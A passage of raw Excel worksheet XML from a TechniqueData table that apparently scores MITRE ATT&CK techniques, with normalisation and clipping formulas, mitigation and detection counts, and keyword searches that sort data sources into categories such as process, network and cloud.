      </c>
      <c r="E352" s="37" t="s">
        <v>1235</v>
      </c>
      <c r="F352" s="37">
        <v>1</v>
      </c>
      <c r="G352" s="37">
        <v>1</v>
      </c>
      <c r="H352" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I352" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J352" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K352" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L352" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M352" s="37">
        <v>0</v>
      </c>
      <c r="N352" s="56">
        <v>0</v>
      </c>
      <c r="O352" s="56">
        <v>0</v>
      </c>
      <c r="P352" s="56">
        <v>0</v>
      </c>
      <c r="Q352" s="56">
        <v>0</v>
      </c>
      <c r="R352" s="57" t="s">
        <v>1236</v>
      </c>
      <c r="S352" s="57">
        <v>5</v>
      </c>
      <c r="T352" s="57" t="s">
        <v>1237</v>
      </c>
      <c r="U352" s="57">
        <v>14</v>
      </c>
      <c r="V352" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18095261904761906</v>
      </c>
      <c r="W352" s="37">
        <v>19</v>
      </c>
      <c r="X352" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y352" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z352" s="37">
        <v>0</v>
      </c>
      <c r="AA352" s="37">
        <v>0</v>
      </c>
      <c r="AB352" s="37">
        <v>0</v>
      </c>
      <c r="AC352" s="37"/>
      <c r="AD352" s="50" t="s">
        <v>1238</v>
      </c>
      <c r="AE352" s="37" t="str" cm="1">
        <f t="array" ref="AE352">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD352)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF352" s="37">
        <v>348</v>
      </c>
      <c r="AG352" s="37" t="str" cm="1">
        <f t="array" ref="AG352">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD352)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH352" s="37">
        <v>348</v>
      </c>
      <c r="AI352" s="37" t="str" cm="1">
        <f t="array" ref="AI352">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD352)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ352" s="37">
        <v>348</v>
      </c>
      <c r="AK352" s="37" t="str" cm="1">
        <f t="array" ref="AK352">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD352)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL352" s="37">
        <v>348</v>
      </c>
      <c r="AM352" s="37" t="str" cm="1">
        <f t="array" ref="AM352">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD352)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN352" s="37">
        <v>0</v>
      </c>
      <c r="AO352" s="37">
        <v>0</v>
      </c>
      <c r="AP352" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ352" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>130.4556661111111</v>
      </c>
      <c r="AR352" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS352" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT352" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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53" spans="1:47" ht="51">
      <c r="A353" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B353" s="37">
        <f t="shared" si="5"/>
        <v>153.00476190476189</v>
      </c>
      <c r="C353" s="37" t="s">
        <v>1239</v>
      </c>
      <c r="D353" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E353" s="37" t="s">
        <v>1240</v>
      </c>
      <c r="F353" s="37">
        <v>1</v>
      </c>
      <c r="G353" s="37">
        <v>1</v>
      </c>
      <c r="H353" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I353" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J353" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K353" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L353" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M353" s="37">
        <v>0</v>
      </c>
      <c r="N353" s="56">
        <v>0</v>
      </c>
      <c r="O353" s="56">
        <v>2</v>
      </c>
      <c r="P353" s="56">
        <v>0</v>
      </c>
      <c r="Q353" s="56">
        <v>0</v>
      </c>
      <c r="R353" s="57"/>
      <c r="S353" s="57">
        <v>0</v>
      </c>
      <c r="T353" s="57"/>
      <c r="U353" s="57">
        <v>0</v>
      </c>
      <c r="V353" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W353" s="37">
        <v>0</v>
      </c>
      <c r="X353" s="37">
        <v>0</v>
      </c>
      <c r="Y353" s="37">
        <v>0</v>
      </c>
      <c r="Z353" s="37">
        <v>2</v>
      </c>
      <c r="AA353" s="37">
        <v>0.02</v>
      </c>
      <c r="AB353" s="37">
        <v>0.02</v>
      </c>
      <c r="AC353" s="37"/>
      <c r="AD353" s="50" t="s">
        <v>1241</v>
      </c>
      <c r="AE353" s="37" t="str" cm="1">
        <f t="array" ref="AE353">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD353)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF353" s="37">
        <v>349</v>
      </c>
      <c r="AG353" s="37" t="str" cm="1">
        <f t="array" ref="AG353">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD353)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH353" s="37">
        <v>349</v>
      </c>
      <c r="AI353" s="37" t="str" cm="1">
        <f t="array" ref="AI353">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD353)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ353" s="37">
        <v>349</v>
      </c>
      <c r="AK353" s="37" t="str" cm="1">
        <f t="array" ref="AK353">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD353)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL353" s="37">
        <v>349</v>
      </c>
      <c r="AM353" s="37" t="str" cm="1">
        <f t="array" ref="AM353">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD353)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN353" s="37">
        <v>0</v>
      </c>
      <c r="AO353" s="37">
        <v>0</v>
      </c>
      <c r="AP353" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ353" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>51.0015873015873</v>
      </c>
      <c r="AR353" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS353" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT353" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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54" spans="1:47" ht="51">
      <c r="A354" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B354" s="37">
        <f t="shared" si="5"/>
        <v>420.29979985714289</v>
      </c>
      <c r="C354" s="37" t="s">
        <v>1242</v>
      </c>
      <c r="D354" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E354" s="37" t="s">
        <v>1243</v>
      </c>
      <c r="F354" s="37">
        <v>1</v>
      </c>
      <c r="G354" s="37">
        <v>1</v>
      </c>
      <c r="H354" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I354" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J354" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K354" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L354" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M354" s="37">
        <v>0</v>
      </c>
      <c r="N354" s="56">
        <v>3</v>
      </c>
      <c r="O354" s="56">
        <v>7</v>
      </c>
      <c r="P354" s="56">
        <v>1</v>
      </c>
      <c r="Q354" s="56">
        <v>1</v>
      </c>
      <c r="R354" s="57" t="s">
        <v>1244</v>
      </c>
      <c r="S354" s="57">
        <v>9</v>
      </c>
      <c r="T354" s="57" t="s">
        <v>1245</v>
      </c>
      <c r="U354" s="57">
        <v>6</v>
      </c>
      <c r="V354" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.19999985714285715</v>
      </c>
      <c r="W354" s="37">
        <v>15</v>
      </c>
      <c r="X354" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y354" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z354" s="37">
        <v>12</v>
      </c>
      <c r="AA354" s="37">
        <v>0.12</v>
      </c>
      <c r="AB354" s="37">
        <v>0.12</v>
      </c>
      <c r="AC354" s="37"/>
      <c r="AD354" s="50" t="s">
        <v>1224</v>
      </c>
      <c r="AE354" s="37" t="str" cm="1">
        <f t="array" ref="AE354">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD354)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF354" s="37">
        <v>350</v>
      </c>
      <c r="AG354" s="37" t="str" cm="1">
        <f t="array" ref="AG354">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD354)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH354" s="37">
        <v>350</v>
      </c>
      <c r="AI354" s="37" t="str" cm="1">
        <f t="array" ref="AI354">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD354)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ354" s="37">
        <v>350</v>
      </c>
      <c r="AK354" s="37" t="str" cm="1">
        <f t="array" ref="AK354">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD354)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL354" s="37">
        <v>350</v>
      </c>
      <c r="AM354" s="37" t="str" cm="1">
        <f t="array" ref="AM354">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD354)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN354" s="37">
        <v>0</v>
      </c>
      <c r="AO354" s="37">
        <v>1</v>
      </c>
      <c r="AP354" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ354" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>140.09993328571429</v>
      </c>
      <c r="AR354" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS354" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT354" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU35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3.3595222210884352</v>
      </c>
    </row>
    <row r="355" spans="1:47" ht="68">
      <c r="A355" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B355" s="37">
        <f t="shared" si="5"/>
        <v>214.09503738095239</v>
      </c>
      <c r="C355" s="37" t="s">
        <v>1246</v>
      </c>
      <c r="D355" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E355" s="37" t="s">
        <v>1247</v>
      </c>
      <c r="F355" s="37">
        <v>1</v>
      </c>
      <c r="G355" s="37">
        <v>1</v>
      </c>
      <c r="H355" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I355" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J355" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K355" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L355" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M355" s="37">
        <v>0</v>
      </c>
      <c r="N355" s="56">
        <v>0</v>
      </c>
      <c r="O355" s="56">
        <v>2</v>
      </c>
      <c r="P355" s="56">
        <v>1</v>
      </c>
      <c r="Q355" s="56">
        <v>0</v>
      </c>
      <c r="R355" s="57">
        <v>2.6</v>
      </c>
      <c r="S355" s="57">
        <v>1</v>
      </c>
      <c r="T355" s="57" t="s">
        <v>1248</v>
      </c>
      <c r="U355" s="57">
        <v>3</v>
      </c>
      <c r="V355" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>5.2380809523809524E-2</v>
      </c>
      <c r="W355" s="37">
        <v>4</v>
      </c>
      <c r="X355" s="37">
        <v>7.2727E-2</v>
      </c>
      <c r="Y355" s="37">
        <v>7.2727E-2</v>
      </c>
      <c r="Z355" s="37">
        <v>3</v>
      </c>
      <c r="AA355" s="37">
        <v>0.03</v>
      </c>
      <c r="AB355" s="37">
        <v>0.03</v>
      </c>
      <c r="AC355" s="37"/>
      <c r="AD355" s="50" t="s">
        <v>1249</v>
      </c>
      <c r="AE355" s="37" t="str" cm="1">
        <f t="array" ref="AE355">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD355)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF355" s="37">
        <v>351</v>
      </c>
      <c r="AG355" s="37" t="str" cm="1">
        <f t="array" ref="AG355">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD355)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH355" s="37">
        <v>351</v>
      </c>
      <c r="AI355" s="37" t="str" cm="1">
        <f t="array" ref="AI355">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD355)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ355" s="37">
        <v>351</v>
      </c>
      <c r="AK355" s="37" t="str" cm="1">
        <f t="array" ref="AK355">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD355)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL355" s="37">
        <v>351</v>
      </c>
      <c r="AM355" s="37" t="str" cm="1">
        <f t="array" ref="AM355">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD355)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN355" s="37">
        <v>0</v>
      </c>
      <c r="AO355" s="37">
        <v>0</v>
      </c>
      <c r="AP355" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ355" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>71.365012460317459</v>
      </c>
      <c r="AR355" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS355" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT355" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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56" spans="1:47" ht="68">
      <c r="A356" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B356" s="37">
        <f t="shared" si="5"/>
        <v>328.76680085714287</v>
      </c>
      <c r="C356" s="37" t="s">
        <v>1250</v>
      </c>
      <c r="D356" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E356" s="37" t="s">
        <v>1251</v>
      </c>
      <c r="F356" s="37">
        <v>1</v>
      </c>
      <c r="G356" s="37">
        <v>1</v>
      </c>
      <c r="H356" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I356" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J356" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K356" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L356" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M356" s="37">
        <v>0</v>
      </c>
      <c r="N356" s="56">
        <v>2</v>
      </c>
      <c r="O356" s="56">
        <v>1</v>
      </c>
      <c r="P356" s="56">
        <v>1</v>
      </c>
      <c r="Q356" s="56">
        <v>0</v>
      </c>
      <c r="R356" s="57" t="s">
        <v>1252</v>
      </c>
      <c r="S356" s="57">
        <v>7</v>
      </c>
      <c r="T356" s="57" t="s">
        <v>1253</v>
      </c>
      <c r="U356" s="57">
        <v>5</v>
      </c>
      <c r="V356" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333342857142857</v>
      </c>
      <c r="W356" s="37">
        <v>12</v>
      </c>
      <c r="X356" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y356" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z356" s="37">
        <v>4</v>
      </c>
      <c r="AA356" s="37">
        <v>0.04</v>
      </c>
      <c r="AB356" s="37">
        <v>0.04</v>
      </c>
      <c r="AC356" s="37"/>
      <c r="AD356" s="50" t="s">
        <v>1249</v>
      </c>
      <c r="AE356" s="37" t="str" cm="1">
        <f t="array" ref="AE356">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD356)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF356" s="37">
        <v>352</v>
      </c>
      <c r="AG356" s="37" t="str" cm="1">
        <f t="array" ref="AG356">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD356)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH356" s="37">
        <v>352</v>
      </c>
      <c r="AI356" s="37" t="str" cm="1">
        <f t="array" ref="AI356">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD356)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ356" s="37">
        <v>352</v>
      </c>
      <c r="AK356" s="37" t="str" cm="1">
        <f t="array" ref="AK356">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD356)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL356" s="37">
        <v>352</v>
      </c>
      <c r="AM356" s="37" t="str" cm="1">
        <f t="array" ref="AM356">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD356)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN356" s="37">
        <v>0</v>
      </c>
      <c r="AO356" s="37">
        <v>0</v>
      </c>
      <c r="AP356" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ356" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>109.58893361904762</v>
      </c>
      <c r="AR356" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS356" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT356" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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57" spans="1:47" ht="68">
      <c r="A357" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B357" s="37">
        <f t="shared" si="5"/>
        <v>309.51401657142861</v>
      </c>
      <c r="C357" s="37" t="s">
        <v>1254</v>
      </c>
      <c r="D357" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E357" s="37" t="s">
        <v>1255</v>
      </c>
      <c r="F357" s="37">
        <v>1</v>
      </c>
      <c r="G357" s="37">
        <v>1</v>
      </c>
      <c r="H357" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I357" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J357" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K357" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L357" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M357" s="37">
